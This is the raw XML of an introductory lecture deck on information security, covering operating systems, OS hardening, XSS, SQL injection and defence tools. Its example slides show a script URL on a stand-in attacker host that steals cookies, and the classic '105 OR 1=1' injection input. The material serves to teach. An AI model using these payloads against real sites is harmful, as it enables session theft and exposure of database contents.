            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hackerssite.com/dangerous.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050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74641" y="3527407"/>
            <a:ext cx="1804085" cy="258532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900" dirty="0"/>
              <a:t>The attacker uses one of the website's forms to insert a malicious string into the website's database.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900" dirty="0"/>
              <a:t>The victim requests a page from the website.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900" dirty="0"/>
              <a:t>The website includes the malicious string from the database in the response and sends it to the victim.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900" dirty="0"/>
              <a:t>The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server.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75775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3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Consequences of Malicious JavaScript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 smtClean="0"/>
              <a:t>Cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker can access the victim's cookies associated with the website using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, send them to his own server, and use them to extract sensitive information like session IDs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Keylogging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker can register a keyboard event listener using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and then send all of the user's keystrokes to his own server, potentially recording sensitive information such as passwords and credit card numbers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker can insert a fake login form into the page, set the form's action attribute to target his own server, and then trick the user into submitting sensitive information.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3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Defense against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> attack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Safe programming practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web application firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signature based filtering and blocking malicious content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3570615"/>
            <a:ext cx="573405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1993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Injection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11913"/>
            <a:ext cx="7886700" cy="3478059"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>malicious SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>commands into an SQL statement, via web page input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injected SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>commands, when executed, may expose the whole database to the attacker.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791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4919565" y="1046196"/>
            <a:ext cx="2617237" cy="23618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350" dirty="0"/>
              <a:t>Database Server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31095"/>
            <a:ext cx="7886700" cy="40495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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="Content Placeholder 12"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4989156" y="1829345"/>
          <a:ext cx="2476501" cy="1629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1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7647">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
                        <a:t>userID</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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Credit card</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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Phone no.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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102</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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213456784534123</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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103</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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763954856820120</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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104</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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109746755839023</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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105</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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974756452884890</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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628650" y="1787978"/>
            <a:ext cx="2744366" cy="225334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350" dirty="0"/>
              <a:t>Website creditcard.com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825759" y="2277835"/>
            <a:ext cx="1784480" cy="1539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350" dirty="0" err="1"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825759" y="2431791"/>
            <a:ext cx="1784480" cy="391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350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825759" y="2862165"/>
            <a:ext cx="1784480" cy="1539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350" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825759" y="3016120"/>
            <a:ext cx="1784480" cy="391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350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944725" y="2522765"/>
            <a:ext cx="1588537" cy="1609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/>
              <a:t>105 OR 1 = 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45529" y="1340109"/>
            <a:ext cx="2337319" cy="2729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25" b="1"/>
              <a:t>SELECT * FROM Users WHERE UserId = 105 or 1=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944725" y="3121081"/>
            <a:ext cx="1588537" cy="1433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***********</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Content Placeholder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0206386"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="825759" y="2085242"/>
          <a:ext cx="2342764" cy="175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26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3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r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
                        <a:t>userID</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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Credit card</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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Phone no.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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568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102</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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213456784534123</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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568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103</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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763954856820120</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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568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104</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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109746755839023</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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568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105</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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974756452884890</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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" name="Right Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20421991" flipV="1">
            <a:off x="2383555" y="1996657"/>
            <a:ext cx="2771773" cy="173963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52971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3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Consequences of SQL Injection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Attacker gets access to confidential data and can modify it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker can use the data to impersonate as a system admin and gain control of the server.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52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Security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Sniffers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Web Application Analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fuzzers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88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OS Security - Hardening an OS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Remove unnecessary software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove or turn off unessential services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alter default accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use the principle of least privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apply software updates in a timely manner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implement logging and auditing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59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Some Defense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Antivirus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software firewalls </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability Assessment Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Exploit Frameworks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34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Windows Utilities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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>services.msc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  -Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or enable Windows services. These are system-level programs that typically start when Windows boots up. Services run even when no user is logged in to Windows. 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Netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> provides a way to check if various aspects of TCP/IP are working and what connections are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>present  (Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  to see UDP and TCP connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eventvwr.msc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - View logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>msconfig.exe   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Microsoft System Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Utilitystart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>-up processes, needs admin access)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39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1583091" y="381000"/>
            <a:ext cx="6297215" cy="684212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91425" tIns="45700" rIns="91425" bIns="45700" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="006666"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="36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 is an Operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="360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System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="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502598" y="1371600"/>
            <a:ext cx="8458201" cy="5086349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91425" tIns="45700" rIns="91425" bIns="45700" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="34290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Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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 program that acts as an interface between a user of a computer and the computer hardware.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100000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="320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Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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Manages the various components  (processor(s), main memory, disks, printers, I/O Devices)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482913" y="32443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50909194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What is an Operating System?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www2.ts.avnet.com/uk/images/storage_operating_system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280" y="1825625"/>
            <a:ext cx="3671441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626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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3486150" y="6400800"/>
            <a:ext cx="21717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en-US" sz="1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A. Frank - P.  Weisberg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Shape 237"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784747" y="762002"/>
            <a:ext cx="6216252" cy="533399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91425" tIns="45700" rIns="91425" bIns="45700" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="006666"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="36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Static View of System Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841082" y="1825625"/>
            <a:ext cx="5461835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591023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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3486150" y="6400800"/>
            <a:ext cx="21717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en-US" sz="1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A. Frank - P.  Weisberg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Shape 244"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784747" y="762003"/>
            <a:ext cx="6216252" cy="533399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91425" tIns="45700" rIns="91425" bIns="45700" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="006666"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="36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Dynamic View of System Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="245" name="Shape 245"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph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676400" y="1447800"/>
            <a:ext cx="5591175" cy="4737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041571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OS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Manage resources on a computer system (memory, I/O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Control/execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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user/application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Make the computer system convenient to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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lang="en-US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en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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computer hardware in an efficient manner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69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OS Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="http://www2.ts.avnet.com/uk/images/storage_operating_system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281" y="1825625"/>
            <a:ext cx="2521520" cy="298846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3530724"/>
            <a:ext cx="1107810" cy="124531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2000" y="4826124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Innocent user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6859" y="152400"/>
            <a:ext cx="1560128" cy="21336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636859" y="2381750"/>
            <a:ext cx="2821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Attacker: Controls malicious files and applications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2438400" y="4153380"/>
            <a:ext cx="685800" cy="36794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2130140" y="2921124"/>
            <a:ext cx="917860" cy="6096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3271720" y="1055360"/>
            <a:ext cx="2057400" cy="79216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3347920" y="1132490"/>
            <a:ext cx="2133600" cy="86743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4948120" y="1542722"/>
            <a:ext cx="718952" cy="3810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5062420" y="1733222"/>
            <a:ext cx="654621" cy="34383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381000" y="5334000"/>
            <a:ext cx="75438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Ultimate goal of a an attacker is to break into a system.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9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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr 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965883967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1067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4_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5051</TotalTime>
  <Words>1459</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>245</Paragraphs>
  <Slides>29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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Schoolbook</vt:lpstr>
      <vt:lpstr>Libre Baskerville</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>4_Oriel</vt:lpstr>
      <vt:lpstr>INFORMATION SECURITY</vt:lpstr>
      <vt:lpstr>Best Practice: Defense in Depth</vt:lpstr>
      <vt:lpstr>What is an Operating System</vt:lpstr>
      <vt:lpstr>What is an Operating System?</vt:lpstr>
      <vt:lpstr>Static View of System Components</vt:lpstr>
      <vt:lpstr>Dynamic View of System Components</vt:lpstr>
      <vt:lpstr>OS Goals</vt:lpstr>
      <vt:lpstr>OS Security</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerabilities and threats</vt:lpstr>
      <vt:lpstr>Injection Attacks</vt:lpstr>
      <vt:lpstr>Buffer</vt:lpstr>
      <vt:lpstr>Buffer Overflow: Basic idea</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Dangerous situation when attack can occur</vt:lpstr>
      <vt:lpstr>Challenges of seizing control of execution</vt:lpstr>
      <vt:lpstr>Protection against buffer overflow</vt:lpstr>
      <vt:lpstr>XSS (Cross Site Scripting) Attack </vt:lpstr>
      <vt:lpstr>Example Attack</vt:lpstr>
      <vt:lpstr>Example Attack</vt:lpstr>
      <vt:lpstr>Consequences of Malicious JavaScript</vt:lpstr>
      <vt:lpstr>Defense against xss attack</vt:lpstr>
      <vt:lpstr>SQL Injection </vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Consequences of SQL Injection </vt:lpstr>
      <vt:lpstr>Application Security Tools</vt:lpstr>
      <vt:lpstr>OS Security - Hardening an OS</vt:lpstr>
      <vt:lpstr>Some Defense Tools</vt:lpstr>
      <vt:lpstr>Some Windows Utilities</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Columbus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 SECURITY</dc:title>
  <dc:creator>yesem</dc:creator>
  <cp:lastModifiedBy>Ray, Lydia</cp:lastModifiedBy>
  <cp:revision>48</cp:revision>
  <cp:lastPrinted>2016-04-25T18:08:23Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-18T19:24:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-12T14:09:52Z</dcterms:modified>
</cp:coreProperties>
</file>